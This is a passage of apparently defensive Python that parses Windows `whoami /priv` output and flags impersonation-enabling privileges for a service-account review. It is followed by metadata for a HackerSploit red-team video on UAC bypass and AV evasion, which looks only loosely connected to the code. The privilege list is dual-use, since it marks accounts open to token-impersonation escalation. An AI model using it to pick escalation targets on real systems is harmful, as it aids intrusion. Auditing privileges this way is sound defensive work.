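PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs

def impersonation_risk(text):
    """Sorted (privilege, state) pairs for impersonation-enabling privileges.

    Disabled entries are reported too: a process holding a privilege can
    enable it itself, so the account counts as a holder either way.
    """
    privs = parse_privileges(text)
    return sorted((n, s) for n, s in privs.items() if n in IMPERSONATION_PRIVS)

if __name__ == "__main__":
    for name, state in impersonation_risk(SAMPLE_WHOAMI_PRIV):
        print(f"REVIEW: {name} ({IMPERSONATION_PRIVS[name]}) is {state}")
```

Run it against real `whoami /priv` output captured under each service account to build the review list; an account that does not need to impersonate clients should not hold either privilege.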
Info
Channel: HackerSploit
Views: 22,269
Keywords: hackersploit, hacker exploit, hacking, kali linux, windows bypass uac, windows 10 bypass uac, bypass uac windows 10 without admin rights, bypass uac windows 10, windows kernel exploitation, red team, red teaming, what is a red team, red team exploitation, red team initial access, powershell empire, powershell, empire, powershell empire tutorial, shellter kali linux, av evasion, av evasion 2022, shellter, powershell obfuscation, windows red team, red team windows
Id: vPTbWnCZ0sg
Length: 45min 25sec (2725 seconds)
Published: Tue Dec 27 2022